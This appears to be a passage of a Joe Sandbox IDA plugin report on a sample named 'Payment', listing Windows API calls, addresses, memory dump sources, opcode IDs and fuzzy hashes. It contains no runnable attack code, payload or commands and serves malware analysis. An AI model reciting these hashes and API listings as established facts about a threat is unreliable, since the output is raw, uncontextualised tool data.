                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __swprintf.LIBCMT ref: 00B3419D
                                                          • __swprintf.LIBCMT ref: 00B341AA
                                                            • Part of subcall function 00AF38D8: __woutput_l.LIBCMT ref: 00AF3931
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B341D4
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00B341E0
                                                          • LockResource.KERNEL32(00000000), ref: 00B341ED
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00B3420D
                                                          • LoadResource.KERNEL32(?,00000000), ref: 00B3421F
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00B3422E
                                                          • LockResource.KERNEL32(?), ref: 00B3423A
                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B3429B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                          • String ID:
                                                          • API String ID: 1433390588-0
                                                          • Opcode ID: 59b2b6a141889019d8de95ef930b8439daf196f21d295d049036cf4df762b4f6
                                                          • Instruction ID: 0735be03d031a8e14a1d7ee88b9f128d228582d4a9d4edad6e370dd1e5be01f2
                                                          • Opcode Fuzzy Hash: 59b2b6a141889019d8de95ef930b8439daf196f21d295d049036cf4df762b4f6
                                                          • Instruction Fuzzy Hash: 2531AEB160520AABDB019FA0DD88EBFBBECEF04301F1045A5F905E3150EB34EA51CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00B31700
                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B30778,?,00000001), ref: 00B31714
                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B3171B
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B30778,?,00000001), ref: 00B3172A
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B3173C
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B30778,?,00000001), ref: 00B31755
                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B30778,?,00000001), ref: 00B31767
                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B30778,?,00000001), ref: 00B317AC
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B30778,?,00000001), ref: 00B317C1
                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B30778,?,00000001), ref: 00B317CC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                          • String ID:
                                                          • API String ID: 2156557900-0
                                                          • Opcode ID: 5b6bdfc9b2febd2ae3d6bf326a82e14aeb969893378a01cec50d6d47f02aa2b9
                                                          • Instruction ID: 7b6360e52ab6729a3ea08ecb7f3b3fe3b6f55eb9ff487e88298a66225ee87652
                                                          • Opcode Fuzzy Hash: 5b6bdfc9b2febd2ae3d6bf326a82e14aeb969893378a01cec50d6d47f02aa2b9
                                                          • Instruction Fuzzy Hash: 0931ACB5650304FBEB119F68DE88B797BEDEB16712F2444A6F800A72A0DF709D40CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00ADFC06
                                                          • OleUninitialize.OLE32(?,00000000), ref: 00ADFCA5
                                                          • UnregisterHotKey.USER32(?), ref: 00ADFDFC
                                                          • DestroyWindow.USER32(?), ref: 00B14A00
                                                          • FreeLibrary.KERNEL32(?), ref: 00B14A65
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B14A92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: c0701b3eeb5e7f4aa3291c7a08daddefd4eadd4ae2b893b1c32c799c52b5ccb9
                                                          • Instruction ID: 8efee4ffbc6fc663dad5bdd0d04800014c7df7982ab1c891ed34c096827c28fe
                                                          • Opcode Fuzzy Hash: c0701b3eeb5e7f4aa3291c7a08daddefd4eadd4ae2b893b1c32c799c52b5ccb9
                                                          • Instruction Fuzzy Hash: 50A159307112228FCB29EF14C595A6AF7A4EF04740F5542EEE90BAB262DB30AD56CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • EnumChildWindows.USER32(?,00B2AA64), ref: 00B2A9A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ChildEnumWindows
                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                          • API String ID: 3555792229-1603158881
                                                          • Opcode ID: 89e55f399cb183178aef98b2e499712e3c80d311eb87711192880903e159f4bb
                                                          • Instruction ID: b039533a76ce7f844961d2bc82985869d9b5dc0f09ae903aa17fcff9337f3e4f
                                                          • Opcode Fuzzy Hash: 89e55f399cb183178aef98b2e499712e3c80d311eb87711192880903e159f4bb
                                                          • Instruction Fuzzy Hash: 5191B33190061AEBDF18EFA0D581BF9FBB4FF04304F148199E99EA7151DB306A99CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00AD2EAE
                                                            • Part of subcall function 00AD1DB3: GetClientRect.USER32(?,?), ref: 00AD1DDC
                                                            • Part of subcall function 00AD1DB3: GetWindowRect.USER32(?,?), ref: 00AD1E1D
                                                            • Part of subcall function 00AD1DB3: ScreenToClient.USER32(?,?), ref: 00AD1E45
                                                          • GetDC.USER32 ref: 00B0CF82
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B0CF95
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B0CFA3
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B0CFB8
                                                          • ReleaseDC.USER32(?,00000000), ref: 00B0CFC0
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B0D04B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: 85ba589add24c0e848f7c9a0d1a446eeb3d3724f530b0bf371d4c7de8583a3d2
                                                          • Instruction ID: 458bdfe1a2954e97a3c79d69b59b308af2c0f9b54f056858e6f3d81b5100f3a9
                                                          • Opcode Fuzzy Hash: 85ba589add24c0e848f7c9a0d1a446eeb3d3724f530b0bf371d4c7de8583a3d2
                                                          • Instruction Fuzzy Hash: 2971AF30500205EFCF219FA4C894AAA7FF6FF48351F1442AAED565B2E6DB318C46DB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                            • Part of subcall function 00AD2344: GetCursorPos.USER32(?), ref: 00AD2357
                                                            • Part of subcall function 00AD2344: ScreenToClient.USER32(00B967B0,?), ref: 00AD2374
                                                            • Part of subcall function 00AD2344: GetAsyncKeyState.USER32(00000001), ref: 00AD2399
                                                            • Part of subcall function 00AD2344: GetAsyncKeyState.USER32(00000002), ref: 00AD23A7
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B5C2E4
                                                          • ImageList_EndDrag.COMCTL32 ref: 00B5C2EA
                                                          • ReleaseCapture.USER32 ref: 00B5C2F0
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00B5C39A
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B5C3AD
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B5C48F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                          • API String ID: 1924731296-2107944366
                                                          • Opcode ID: da0898b6abeca15382869dd4cb988f07c012543963b26c1317b8a6992112c327
                                                          • Instruction ID: a5fe1092d3987a106cda9c108d959aa588a61da51bf41bfcbf409a98fe062d3a
                                                          • Opcode Fuzzy Hash: da0898b6abeca15382869dd4cb988f07c012543963b26c1317b8a6992112c327
                                                          • Instruction Fuzzy Hash: 7651B030204305AFDB00EF20C995F6A7BE1FB88311F0485AEF9968B2F1DB70A949CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00B5F910), ref: 00B4903D
                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00B5F910), ref: 00B49071
                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00B491EB
                                                          • SysFreeString.OLEAUT32(?), ref: 00B49215
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                          • String ID:
                                                          • API String ID: 560350794-0
                                                          • Opcode ID: 8b998f1d6a24178742aa5d797524424eb5ec1cfd31100bdff39855c6d31a12de
                                                          • Instruction ID: 31a25299c79df36f420726b067086cf4e792d7ed4be3ad08872b9285aaa0ecb3
                                                          • Opcode Fuzzy Hash: 8b998f1d6a24178742aa5d797524424eb5ec1cfd31100bdff39855c6d31a12de
                                                          • Instruction Fuzzy Hash: A1F14B71A00209EFDF04DF94C888EAEB7B9FF49315F108499F916AB291DB31AE45DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B4F9C9
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B4FB5C
                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B4FB80
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B4FBC0
                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B4FBE2
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B4FD5E
                                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B4FD90
                                                          • CloseHandle.KERNEL32(?), ref: 00B4FDBF
                                                          • CloseHandle.KERNEL32(?), ref: 00B4FE36
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                          • String ID:
                                                          • API String ID: 4090791747-0
                                                          • Opcode ID: 108c08f733c52b6ca08c748eeae06b365269194df222f05e5e09bfcb8a7e49ea
                                                          • Instruction ID: 56169daeb2cb95798b466e41e43b92a14bfc2b9e1fc28ecb067c86b8946ec419
                                                          • Opcode Fuzzy Hash: 108c08f733c52b6ca08c748eeae06b365269194df222f05e5e09bfcb8a7e49ea
                                                          • Instruction Fuzzy Hash: 63E1A0316043429FCB14EF24C991B7ABBE1EF85354F1484ADF89A8B2A2DB31DD44DB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B338D3,?), ref: 00B348C7
                                                            • Part of subcall function 00B348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B338D3,?), ref: 00B348E0
                                                            • Part of subcall function 00B34CD3: GetFileAttributesW.KERNEL32(?,00B33947), ref: 00B34CD4
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 00B34FE2
                                                          • _wcscmp.LIBCMT ref: 00B34FFC
                                                          • MoveFileW.KERNEL32(?,?), ref: 00B35017
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                          • String ID:
                                                          • API String ID: 793581249-0
                                                          • Opcode ID: 7358c99de80f5145d2d762eb9875f2523fa49369e4c5e4bdab68eb0a1b234765
                                                          • Instruction ID: 8d307fdf3b5cdbf3c9298b93f74e438d5d4ae333ffec83df3a52fe3abc7f02b5
                                                          • Opcode Fuzzy Hash: 7358c99de80f5145d2d762eb9875f2523fa49369e4c5e4bdab68eb0a1b234765
                                                          • Instruction Fuzzy Hash: 635176B24087859BC724DBA0C881ADFB7ECEF84341F14496EB289D3151EF75A68CC766
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00B5896E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 2f2de133446d0068ab5e6a00020f9a2b649afa999caab6ac4638ef7e6f2b209f
                                                          • Instruction ID: dc6962bf0ef1740c7aa1d63f9bed0884f6b9904f3f9bebd5440bd3c8995fb986
                                                          • Opcode Fuzzy Hash: 2f2de133446d0068ab5e6a00020f9a2b649afa999caab6ac4638ef7e6f2b209f
                                                          • Instruction Fuzzy Hash: 97519130600209BBEF209F24CC85BA97BE5FB05352F6041D6FD15F62A1DF71A988CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B0C547
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B0C569
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B0C581
                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B0C59F
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B0C5C0
                                                          • DestroyIcon.USER32(00000000), ref: 00B0C5CF
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B0C5EC
                                                          • DestroyIcon.USER32(?), ref: 00B0C5FB
                                                            • Part of subcall function 00B5A71E: DeleteObject.GDI32(00000000), ref: 00B5A757
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                          • String ID:
                                                          • API String ID: 2819616528-0
                                                          • Opcode ID: 7c8e25a1b80f7382d65c6b74fc01fca2a2712dbc6611285ed8bd19672230ae3a
                                                          • Instruction ID: 020696ed0782b913f651d214de6b288d51501dc46238b1cc06e94ae74db83e43
                                                          • Opcode Fuzzy Hash: 7c8e25a1b80f7382d65c6b74fc01fca2a2712dbc6611285ed8bd19672230ae3a
                                                          • Instruction Fuzzy Hash: 21516B74600205AFDB24DF24DD85FAA7BF5EB68351F10466AF902972E0DBB0ED90DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B28A84,00000B00,?,?), ref: 00B28E0C
                                                          • HeapAlloc.KERNEL32(00000000,?,00B28A84,00000B00,?,?), ref: 00B28E13
                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B28A84,00000B00,?,?), ref: 00B28E28
                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00B28A84,00000B00,?,?), ref: 00B28E30
                                                          • DuplicateHandle.KERNEL32(00000000,?,00B28A84,00000B00,?,?), ref: 00B28E33
                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B28A84,00000B00,?,?), ref: 00B28E43
                                                          • GetCurrentProcess.KERNEL32(00B28A84,00000000,?,00B28A84,00000B00,?,?), ref: 00B28E4B
                                                          • DuplicateHandle.KERNEL32(00000000,?,00B28A84,00000B00,?,?), ref: 00B28E4E
                                                          • CreateThread.KERNEL32(00000000,00000000,00B28E74,00000000,00000000,00000000), ref: 00B28E68
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                          • String ID:
                                                          • API String ID: 1957940570-0
                                                          • Opcode ID: 17dcbf87e9afaba7c83645dc168a8dec097d1e38aa190424937df3f7183b25fa
                                                          • Instruction ID: 8b019d148c3f54a7cf6a2fd412db4e7d6124dd5558a457368013a08e243d4ab6
                                                          • Opcode Fuzzy Hash: 17dcbf87e9afaba7c83645dc168a8dec097d1e38aa190424937df3f7183b25fa
                                                          • Instruction Fuzzy Hash: 8601A8B5640709FFEA10ABA5DC49F6B7BACEB89711F014461FA05DB1A1CA7598018A20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$_memset
                                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                          • API String ID: 2862541840-625585964
                                                          • Opcode ID: 0256dbcd40431e6df6a7047666264f267d487efcf1ae3594a24cd993f34dea1d
                                                          • Instruction ID: 82483aa9a5507d8060bd928f632aa851b3c012f5d905fc4bb27823355f90fab7
                                                          • Opcode Fuzzy Hash: 0256dbcd40431e6df6a7047666264f267d487efcf1ae3594a24cd993f34dea1d
                                                          • Instruction Fuzzy Hash: B4917C71A00219AFDF24DFA5D884FAFBBF8EF45710F10819AF515AB290D7709A05DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B27652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?,?,?,00B2799D), ref: 00B2766F
                                                            • Part of subcall function 00B27652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?,?), ref: 00B2768A
                                                            • Part of subcall function 00B27652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?,?), ref: 00B27698
                                                            • Part of subcall function 00B27652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B2758C,80070057,?), ref: 00B276A8
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B49B1B
                                                          • _memset.LIBCMT ref: 00B49B28
                                                          • _memset.LIBCMT ref: 00B49C6B
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00B49C97
                                                          • CoTaskMemFree.OLE32(?), ref: 00B49CA2
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 00B49CF0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
